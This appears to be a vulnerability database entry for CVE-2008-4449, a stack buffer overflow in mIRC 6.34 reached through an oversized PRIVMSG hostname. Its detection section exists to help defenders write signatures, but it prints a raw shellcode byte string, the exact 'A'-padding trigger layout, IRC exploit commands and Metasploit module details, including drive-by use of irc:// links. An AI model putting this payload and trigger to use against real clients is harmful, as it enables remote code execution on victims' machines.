cbcvebase.
CVE-2008-4449
published 2008-10-06

CVE-2008-4449: Stack-based buffer overflow in mIRC 6.34 allows remote attackers to execute arbitrary code via a long hostname in a PRIVMSG message.

PriorityP356critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
38.74%
98.4th percentile
Stack-based buffer overflow in mIRC 6.34 allows remote attackers to execute arbitrary code via a long hostname in a PRIVMSG message.

Affected

1 ranges
VendorProductVersion rangeFixed in
mircmirc

Detection & IOCsextracted from sources · hover to see the quote

commandPRIVMSG wow : /FINGER wow
command:my_irc_server.com 001 wow :Welcome to the Internet Relay Network wow
port6667
bytes
\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e\x95\x97\xf1\x83\xeb\xfc\xe2\xf4\xe2\x7d\xd3\xf1\x1e\x95\x1c\xb4\x22\x1e\xeb\xf4\x66\x94\x78\x7a\x51\x8d\x1c\xae\x3e\x94\x7c\xb8\x95\xa1\x1c\xf0\xf0\xa4\x57\x68\xb2\x11\x57\x85\x19\x54\x5d\xfc\x1f\x57\x7c\x05\x25\xc1\xb3\xf5\x6b\x70\x1c\xae\x3a\x94\x7c\x97\x95\x99\xdc\x7a\x41\x89\x96\x1a\x95\x89\x1c\xf0\xf5\x1c\xcb\xd5\x1a\x56\xa6\x31\x7a\x1e\xd7\xc1\x9b\x55\xef\xfd\x95\xd5\x9b\x7a\x6e\x89\x3a\x7a\x76\x9d\x7c\xf8\x95\x15\x27\xf1\x1e\x95\x1c\x99\x22\xca\xa6\x07\x7e\xc3\x1e\x09\x9d\x55\xec\xa1\x76\x65\x1d\xf5\x41\xfd\x0f\x0f\x94\x9b\xc0\x0e\xf9\xf6\xf6\x9d\x7d\x95\x97\xf1
  • Detect oversized IRC PRIVMSG hostname: a PRIVMSG message with a hostname/prefix field of 307+ 'A' characters (or random alphanumeric) followed by binary data is the exploit trigger pattern.
  • Detect exploit PoC pattern: IRC PRIVMSG with a prefix of 313 'A' characters followed by two bytes \x43\x43 is the PoC trigger.
  • Payload bad characters for this exploit include null bytes, IRC control characters, and common special characters; network signatures should flag IRC PRIVMSG messages containing binary data in the source prefix field.
  • The exploit can be triggered via a browser by redirecting a victim to an irc:// URI pointing to the attacker's server, enabling drive-by exploitation.
  • Metasploit module listens on TCP port 6667 acting as a rogue IRC server; monitor for outbound mIRC connections to untrusted IRC servers on port 6667 followed by receipt of a PRIVMSG with a binary-laden prefix.
  • ·Due to payload space constraints (160 bytes), ordinal payloads may be required instead of full shellcode when using the Metasploit module.
  • ·The Metasploit module uses a StackAdjustment of -3500, which is an unusual value that may affect payload reliability on non-targeted configurations.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.